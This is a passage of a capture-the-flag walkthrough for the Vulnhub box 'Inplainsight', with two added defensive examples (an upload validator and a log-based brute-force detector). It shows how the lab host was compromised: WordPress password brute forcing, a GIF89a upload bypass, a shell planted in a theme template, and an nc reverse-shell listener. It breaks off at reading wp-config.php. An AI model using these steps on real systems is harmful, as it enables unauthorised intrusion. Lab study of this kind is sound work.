Vulnhub: Inplainsight box, detailed test process and lessons learned

Inplainsight

Identifying the target host's IP address
```
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
_____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor
192.168.56.100  08:00:27:86:38:75      1      60  PCS Systemtechnik GmbH
192.168.56.254  08:00:27:f9:29:62      1      60  PCS Systemtechnik GmbH
```
Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.254.
NMAP scan
```
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 20:38 EDT
Nmap scan report for kb.final (192.168.56.254)
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp           306 Nov 22  2019 todo.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 392d3630aaac5d1601082c5fc56717b4 (RSA)
|   256 b021a7430c928570ff57c6f937dfe5a2 (ECDSA)
|_  256 7399d582878c0abc3d1e8daab169aa35 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:F9:29:62 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds
```
The NMAP results show that the target has three open ports: 21 (ftp), 22 (ssh) and 80 (http).
Getting a shell
```
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 IPS Corp
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||47934|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Nov 22  2019 .
drwxr-xr-x    2 ftp      ftp          4096 Nov 22  2019 ..
-rw-r--r--    1 ftp      ftp           306 Nov 22  2019 todo.txt
226 Directory send OK.
ftp> get todo.txt
local: todo.txt remote: todo.txt
229 Entering Extended Passive Mode (|||24332|)
150 Opening BINARY mode data connection for todo.txt (306 bytes).
100% |********************************************************************************|   306      410.47 KiB/s    00:00 ETA
226 Transfer complete.
306 bytes received in 00:00 (260.98 KiB/s)
```
```
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ cat todo.txt
mike - please get ride of that worthless wordpress instance! it's a security risk.  if you have privilege issues, please ask joe for assitance.
joe - stop leaving backdoors on the system or your access will be removed! your rabiit holes aren't enough for these elite cyber hacking types.
- boss person
```

  • Users: mike, joe
  • There may be backdoor files on the system
  • Is the target site WordPress?
```
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,js,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/04/15 20:56:47 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10918]
/info.php             (Status: 200) [Size: 84027]
/wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.254/wordpress/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1319837 / 1323366 (99.73%)===============================================================
2023/04/15 20:59:29 Finished
==========================================================
```
Gobuster identified the directory /wordpress. Visiting it, the page renders incompletely; the page source shows that a hostname has to be added to /etc/hosts: inplainsight
```
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo vim /etc/hosts
[sudo] password for kali:

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.254  inplainsight
```
```
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/wordpress/ -e u,p
________________________________________________________
[i] User(s) Identified:
[+] bossperson
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
```
wpscan identified the username bossperson; let's see whether its password can be cracked.
```
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/wordpress/ -U bossperson -P /usr/share/wordlists/rockyou.txt
```
After running for 15 minutes the password still had not been cracked, so I set this direction aside for now.
Next: can any vulnerable plugins be found?
```
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/wordpress/ --plugins-detection mixed
```
No vulnerable plugins were identified.
Back on the default page, I noticed the following:
```
This is the default welcome page used to test the correct operation of the Apache2 server after installation on Ubuntu systems. It is based on the equivalent page on Debian, from which the Ubuntu Apache packaging is derived. If you can read this page, it means that the Apache HTTP server installed at this site is working properly. You should replace this file (located at /var/www/html/index.htnl) before continuing to operate your HTTP server.
If you are a normal user of this web site and don't know what this page is about, this probably means that the site is currently unavailable due to maintenance. If the problem persists, please contact the site's administrator.
```
There is a file /var/www/html/index.htnl.
The extension is odd, so I visited that page.
It contains an animated image; clicking it redirects to another page where files can be uploaded.
But when uploading shell.php, an error is returned: File is not an image.
I intercepted the request with Burp Suite to see whether the check could be bypassed by changing the content type.
Changing the type to image/jpeg in Burp Suite did not work.
Adding a line at the top of shell.php, GIF89a, did:
this time the response is "File is an image - image/gif", and the page source now contains a comment:
Decode it:
```
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ echo 'c28tZGV2LXdvcmRwcmVzcw==' | base64 -d
so-dev-wordpress
```
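An added example (mine, not part of the original post) on why the upload check above was so easy to fool: the form treated anything that began with the six bytes GIF89a as an image. The Python below puts that prefix-only check beside a stricter validator that parses the GIF header and also rejects any file carrying a PHP open tag; both sample inputs are constructed, and the checker function names are my own, not the form's.

```python
import re
import struct

# Constructed sample inputs (not from the box): a minimal valid 1x1 GIF89a, and a file
# that merely begins with the GIF89a signature followed by PHP source.
REAL_GIF = (
    b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)   # logical screen descriptor
    + b"\x00\x00\x00\xff\xff\xff"                         # 2-entry global colour table
    + b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)      # image descriptor
    + b"\x02\x02\x44\x01\x00"                             # LZW min code size, data, terminator
    + b"\x3b"                                             # trailer
)
POLYGLOT = b"GIF89a\n<?php /* placeholder body */ ?>\n"

PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)

def naive_is_image(data: bytes) -> bool:
    """Signature-prefix check of the kind the upload form appeared to rely on."""
    return data.startswith((b"GIF87a", b"GIF89a"))

def strict_is_gif(data: bytes) -> bool:
    """Validate GIF structure instead of trusting the six signature bytes."""
    if len(data) < 14 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return False
    width, height, packed = struct.unpack("<HHB", data[6:11])
    if width == 0 or height == 0:
        return False
    pos = 13                               # end of the logical screen descriptor
    if packed & 0x80:                      # global colour table present, 3 bytes per entry
        pos += 3 * (2 << (packed & 0x07))
    # The next byte must introduce an image (0x2C) or an extension (0x21),
    # and a complete file ends with the trailer byte 0x3B.
    return pos < len(data) and data[pos] in (0x2C, 0x21) and data[-1] == 0x3B

def accept_upload(data: bytes) -> bool:
    """Hardened rule: structurally a GIF and free of PHP open tags anywhere in the body."""
    return strict_is_gif(data) and PHP_TAG.search(data) is None
```

Even the stricter parser is a screen rather than a guarantee: uploads should additionally be re-encoded server-side and stored where the web server will not execute them.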
This should be another directory, which matches the description in the todo file, so I scanned so-dev-wordpress.
```
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress -e u,p
[i] User(s) Identified:
[+] mike
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
```
```
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress -U mike -P /usr/share/wordlists/rockyou.txt
```
Ran for 15 minutes without cracking the password.
```
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress --plugins-detection mixed
```
wpscan did not find any vulnerable plugins here either.
So I tried cracking the other user, admin, instead; just when it felt hopeless, after 5 minutes the password came out:
```
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress -U admin -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
| Username: admin, Password: admin1
```
Only after logging in as admin:admin1 did I find that mike is an ordinary user and admin is the administrator. In many cases the single user wpscan turns up is the administrator, but not on this box.
I replaced the 404 template in the theme editor with shell.php, then visited the 404.php file to get a shell.
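An added example (not from the original post): the wpscan runs above leave a recognisable trail in the web server's access log, namely a run of ?author=N requests followed by a burst of POSTs to wp-login.php. The Python below runs that detection logic over a constructed sample log; the thresholds, user agent string and every log line are my assumptions, not data from the box.

```python
import re
from collections import Counter

# Constructed Apache combined-format sample (hypothetical, not from the box) modelled on
# the traffic the wpscan runs above generate: ?author=N probing, then a wp-login.php burst.
SAMPLE_LOG = """\
192.168.56.206 - - [15/Apr/2023:21:02:11 -0400] "GET /so-dev-wordpress/?author=1 HTTP/1.1" 301 0 "-" "WPScan v3.8"
192.168.56.206 - - [15/Apr/2023:21:02:11 -0400] "GET /so-dev-wordpress/?author=2 HTTP/1.1" 301 0 "-" "WPScan v3.8"
192.168.56.206 - - [15/Apr/2023:21:02:12 -0400] "GET /so-dev-wordpress/?author=3 HTTP/1.1" 404 1043 "-" "WPScan v3.8"
192.168.56.206 - - [15/Apr/2023:21:05:40 -0400] "POST /so-dev-wordpress/wp-login.php HTTP/1.1" 200 2871 "-" "WPScan v3.8"
192.168.56.206 - - [15/Apr/2023:21:05:40 -0400] "POST /so-dev-wordpress/wp-login.php HTTP/1.1" 200 2871 "-" "WPScan v3.8"
192.168.56.206 - - [15/Apr/2023:21:05:41 -0400] "POST /so-dev-wordpress/wp-login.php HTTP/1.1" 200 2871 "-" "WPScan v3.8"
192.168.56.206 - - [15/Apr/2023:21:05:41 -0400] "POST /so-dev-wordpress/wp-login.php HTTP/1.1" 200 2871 "-" "WPScan v3.8"
192.168.56.206 - - [15/Apr/2023:21:05:42 -0400] "POST /so-dev-wordpress/wp-login.php HTTP/1.1" 200 2871 "-" "WPScan v3.8"
192.168.56.206 - - [15/Apr/2023:21:10:02 -0400] "POST /so-dev-wordpress/wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8"
10.0.0.7 - - [15/Apr/2023:21:06:00 -0400] "GET /so-dev-wordpress/ HTTP/1.1" 200 15012 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
AUTHOR_RE = re.compile(r"[?&]author=\d+")

def analyse(log_text, login_threshold=5, author_threshold=3):
    """Return (ip, finding, count) tuples for WordPress user enumeration and login bursts."""
    author_hits, failed_logins, success_after = Counter(), Counter(), set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not combined-format requests
        ip, method, path, status = m["ip"], m["method"], m["path"], int(m["status"])
        if method == "GET" and AUTHOR_RE.search(path):
            author_hits[ip] += 1
        elif method == "POST" and path.endswith("/wp-login.php"):
            if status == 200:          # WordPress re-renders the form on a failed login
                failed_logins[ip] += 1
            elif status == 302 and failed_logins[ip] >= login_threshold:
                success_after.add(ip)  # redirect after a burst of failures: likely a hit
    alerts = [(ip, "author-id enumeration", n)
              for ip, n in author_hits.items() if n >= author_threshold]
    for ip, n in failed_logins.items():
        if n >= login_threshold:
            verdict = "login brute force" + (", likely successful" if ip in success_after else "")
            alerts.append((ip, verdict, n))
    return sorted(alerts)
```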
```
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 54968
Linux inplainsight 5.3.0-23-generic #25-Ubuntu SMP Tue Nov 12 09:22:33 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
22:30:48 up  1:58,  0 users,  load average: 0.03, 1.09, 1.87
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@inplainsight:/$ cd /home
cd /home
www-data@inplainsight:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root root 4.0K Nov 21  2019 .
drwxr-xr-x 19 root root 4.0K Nov 21  2019 ..
drwxr-xr-x  4 joe  joe  4.0K Nov 22  2019 joe
drwxr-xr-x  4 mike mike 4.0K Nov 22  2019 mike
www-data@inplainsight:/home$ cd joe
cd joe
www-data@inplainsight:/home/joe$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 joe  joe  4.0K Nov 22  2019 .
drwxr-xr-x 4 root root 4.0K Nov 21  2019 ..
lrwxrwxrwx 1 root root    9 Nov 22  2019 .bash_history -> /dev/null
-rw-r--r-- 1 joe  joe   220 May  5  2019 .bash_logout
-rw-r--r-- 1 joe  joe  3.7K May  5  2019 .bashrc
drwx------ 2 joe  joe  4.0K Nov 21  2019 .cache
drwx------ 3 joe  joe  4.0K Nov 21  2019 .gnupg
-rw-r--r-- 1 joe  joe   807 May  5  2019 .profile
-rw-rw---- 1 joe  joe    76 Nov 22  2019 journal
www-data@inplainsight:/home/joe$ cd ..
cd ..
www-data@inplainsight:/home$ ls -lah
ls -lah
total 16K
drwxr-xr-x  4 root root 4.0K Nov 21  2019 .
drwxr-xr-x 19 root root 4.0K Nov 21  2019 ..
drwxr-xr-x  4 joe  joe  4.0K Nov 22  2019 joe
drwxr-xr-x  4 mike mike 4.0K Nov 22  2019 mike
www-data@inplainsight:/home$ cd mike
cd mike
www-data@inplainsight:/home/mike$ ls -alh
ls -alh
total 28K
drwxr-xr-x 4 mike mike 4.0K Nov 22  2019 .
drwxr-xr-x 4 root root 4.0K Nov 21  2019 ..
lrwxrwxrwx 1 root root    9 Nov 22  2019 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike  220 Nov 21  2019 .bash_logout
-rw-r--r-- 1 mike mike 3.7K Nov 21  2019 .bashrc
drwx------ 2 mike mike 4.0K Nov 21  2019 .cache
drwx------ 3 mike mike 4.0K Nov 21  2019 .gnupg
-rw-r--r-- 1 mike mike  807 Nov 21  2019 .profile
```
Privilege escalation

```
www-data@inplainsight:/var/www/html/so-dev-wordpress$ cat wp-config.php
cat wp-config.php
```
玛卡巴卡的卡巴卡玛

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表